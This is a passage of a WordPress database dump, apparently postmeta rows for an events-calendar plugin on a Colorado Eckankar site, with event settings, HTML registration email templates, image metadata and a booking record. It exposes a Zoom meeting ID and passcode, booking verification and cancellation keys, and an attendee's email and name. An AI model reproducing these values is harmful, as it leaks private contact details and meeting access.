</td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(167955,267041,'mec_event_status','EventScheduled'),(167956,267041,'mec_moved_online_link',''),(167957,267041,'mec_cancelled_reason',''),(167958,267041,'mec_display_cancellation_reason_in_single_page',''),(167959,267041,'protect_children',''),(167960,267041,'passster_activate_global_protection',NULL),(167961,267041,'passster_activate_protection',NULL),(167962,267041,'passster_protection_type','password'),(167963,267041,'boldgrid_hide_page_title','0'),(167964,267041,'_thumbnail_id','266816'),(167965,267041,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(167966,267041,'boldgrid_in_page_containers','1'),(167968,267041,'_dp_original','266545'),(167969,267041,'_edit_lock','1660877028:15'),(167970,267041,'_edit_last','15'),(167971,267043,'protect_children',''),(167972,267043,'mec_color',''),(167973,267043,'mec_location_id','118'),(167974,267043,'mec_dont_show_map','0'),(167975,267043,'mec_organizer_id','1'),(167976,267043,'mec_read_more',''),(167977,267043,'mec_more_info',''),(167978,267043,'mec_more_info_title',''),(167979,267043,'mec_more_info_target','_self'),(167980,267043,'mec_cost',''),(167981,267043,'mec_currency','a:0:{}'),(167982,267043,'mec_additional_organizer_ids','a:0:{}'),(167983,267043,'mec_additional_location_ids','a:0:{}'),(167984,267043,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-24\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-24\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(167985,267043,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(167986,267043,'mec_certain_weekdays','a:0:{}'),(167987,267043,'mec_allday','0'),(167988,267043,'one_occurrence','0'),(167989,267043,'mec_hide_time','0'),(167990,267043,'mec_hide_end_time','0'),(167991,267043,'mec_comment',''),(167992,267043,'mec_timezone','global'),(167993,267043,'mec_countdown_method','global'),(167994,267043,'mec_public','1'),(167995,267043,'mec_start_date','2022-09-24'),(167996,267043,'mec_start_time_hour','10'),(167997,267043,'mec_start_time_minutes','0'),(167998,267043,'mec_start_time_ampm','AM'),(167999,267043,'mec_start_day_seconds','36000'),(168000,267043,'mec_end_date','2022-09-24'),(168001,267043,'mec_end_time_hour','11'),(168002,267043,'mec_end_time_minutes','0'),(168003,267043,'mec_end_time_ampm','AM'),(168004,267043,'mec_end_day_seconds','39600'),(168005,267043,'mec_repeat_status','0'),(168006,267043,'mec_repeat_type',''),(168007,267043,'mec_repeat_interval','1'),(168008,267043,'mec_repeat_end',''),(168009,267043,'mec_repeat_end_at_occurrences',''),(168010,267043,'mec_repeat_end_at_date',''),(168011,267043,'mec_advanced_days','a:0:{}'),(168012,267043,'mec_in_days',''),(168013,267043,'mec_not_in_days',''),(168014,267043,'mec_hourly_schedules','a:0:{}'),(168015,267043,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168016,267043,'mec_tickets','a:0:{}'),(168017,267043,'mec_fees_global_inheritance','1'),(168018,267043,'mec_fees','a:0:{}'),(168019,267043,'mec_ticket_variations_global_inheritance','1'),(168020,267043,'mec_ticket_variations','a:0:{}'),(168021,267043,'mec_reg_fields_global_inheritance','1'),(168022,267043,'mec_reg_fields','a:0:{}'),(168023,267043,'mec_bfixed_fields','a:0:{}'),(168024,267043,'mec_op','a:0:{}'),(168025,267043,'mec_fields','a:0:{}'),(168026,267043,'mec_event_status','EventScheduled'),(168027,267043,'mec_moved_online_link',''),(168028,267043,'mec_cancelled_reason',''),(168029,267043,'mec_display_cancellation_reason_in_single_page',''),(168030,267043,'boldgrid_hide_page_title','0'),(168031,267043,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(168032,267043,'passster_activate_global_protection',NULL),(168033,267043,'passster_activate_protection',NULL),(168034,267043,'passster_protection_type','password'),(168037,267043,'_dp_original','266104'),(168036,267043,'boldgrid_in_page_containers','1'),(168038,267043,'_edit_lock','1660877491:15'),(168039,267043,'_edit_last','15'),(168040,267043,'_thumbnail_id','266412'),(168041,267044,'mec_color',''),(168042,267044,'mec_location_id','129'),(168043,267044,'mec_dont_show_map','0'),(168044,267044,'mec_organizer_id','1'),(168045,267044,'mec_read_more',''),(168046,267044,'mec_more_info',''),(168047,267044,'mec_more_info_title',''),(168048,267044,'mec_more_info_target','_self'),(168049,267044,'mec_cost',''),(168050,267044,'mec_currency','a:0:{}'),(168051,267044,'mec_additional_organizer_ids','a:0:{}'),(168052,267044,'mec_additional_location_ids','a:0:{}'),(168053,267044,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(168054,267044,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(168055,267044,'mec_certain_weekdays','a:0:{}'),(168056,267044,'mec_allday','0'),(168057,267044,'one_occurrence','0'),(168058,267044,'mec_hide_time','0'),(168059,267044,'mec_hide_end_time','0'),(168060,267044,'mec_comment',''),(168061,267044,'mec_timezone','global'),(168062,267044,'mec_countdown_method','global'),(168063,267044,'mec_public','1'),(168064,267044,'mec_start_date','2022-09-11'),(168065,267044,'mec_start_time_hour','10'),(168066,267044,'mec_start_time_minutes','30'),(168067,267044,'mec_start_time_ampm','AM'),(168068,267044,'mec_start_day_seconds','37800'),(168069,267044,'mec_end_date','2022-09-11'),(168070,267044,'mec_end_time_hour','11'),(168071,267044,'mec_end_time_minutes','30'),(168072,267044,'mec_end_time_ampm','AM'),(168073,267044,'mec_end_day_seconds','41400'),(168074,267044,'mec_repeat_status','0'),(168075,267044,'mec_repeat_type',''),(168076,267044,'mec_repeat_interval','1'),(168077,267044,'mec_repeat_end',''),(168078,267044,'mec_repeat_end_at_occurrences',''),(168079,267044,'mec_repeat_end_at_date',''),(168080,267044,'mec_advanced_days','a:0:{}'),(168081,267044,'mec_in_days',''),(168082,267044,'mec_not_in_days',''),(168083,267044,'mec_hourly_schedules','a:0:{}'),(168084,267044,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(168085,267044,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"AM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(168086,267044,'mec_fees_global_inheritance','1'),(168087,267044,'mec_fees','a:0:{}'),(168088,267044,'mec_ticket_variations_global_inheritance','1'),(168089,267044,'mec_ticket_variations','a:0:{}'),(168090,267044,'mec_reg_fields_global_inheritance','1'),(168091,267044,'mec_reg_fields','a:0:{}'),(168092,267044,'mec_bfixed_fields','a:0:{}'),(168093,267044,'mec_op','a:0:{}'),(168094,267044,'mec_fields','a:0:{}'),(168095,267044,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(168096,267044,'mec_event_status','EventScheduled'),(168097,267044,'mec_moved_online_link',''),(168098,267044,'mec_cancelled_reason',''),(168099,267044,'mec_display_cancellation_reason_in_single_page',''),(168100,267044,'protect_children',''),(168101,267044,'passster_activate_global_protection',NULL),(168102,267044,'passster_activate_protection',NULL),(168103,267044,'passster_protection_type','password'),(168104,267044,'boldgrid_hide_page_title','0'),(168105,267044,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(168106,267044,'boldgrid_in_page_containers','1'),(168110,267044,'_dp_original','266540'),(168108,267044,'_thumbnail_id','267045'),(168109,267044,'_wp_old_date','2022-04-30'),(168111,267044,'_edit_lock','1661388249:2'),(168112,267044,'_edit_last','2'),(168113,267045,'_wp_attached_file','2022/08/BeachSunset.webp'),(168114,267045,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:24:\"2022/08/BeachSunset.webp\";s:8:\"filesize\";i:32894;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"BeachSunset-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13204;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"BeachSunset-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6532;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"BeachSunset-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16694;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"BeachSunset-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27520;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"BeachSunset-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:21084;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"BeachSunset-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17402;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168115,267045,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/08/BeachSunset.webp - cannot be optimized, it has an invalid file type'),(168116,267045,'smush-complete',''),(168185,267060,'_wp_attached_file','2022/08/harold-10.jpg'),(168117,267047,'mec_transaction_id','UPC13837'),(168118,267047,'mec_user_id','1000043'),(168119,267047,'mec_verified','1'),(168120,267047,'mec_verification_key','8755a3f8877d5dde63879da9b6e5bb3d'),(168121,267047,'mec_cancellation_key','bd0cdae7eba6cf1ca3405ab64310a8e4'),(168122,267047,'mec_confirmed','1'),(168123,267047,'mec_event_id','266604'),(168124,267047,'mec_date','1661082300:1661086800'),(168125,267047,'mec_ticket_id',',1,'),(168126,267047,'mec_booking_time','2022-08-19 19:33:46'),(168127,267047,'mec_all_dates','a:0:{}'),(168128,267047,'mec_other_dates','a:0:{}'),(168129,267047,'mec_attention_time','1661082300:1661086800'),(168130,267047,'mec_attention_time_start','1661082300'),(168131,267047,'mec_attention_time_end','1661086800'),(168132,267047,'mec_book_date_submit','20220819193346'),(168133,267047,'mec_booking_location','118'),(168134,267047,'mec_ticket_price_1','0'),(168135,267047,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"huusinger@comcast.net\";s:4:\"name\";s:14:\"Gordon 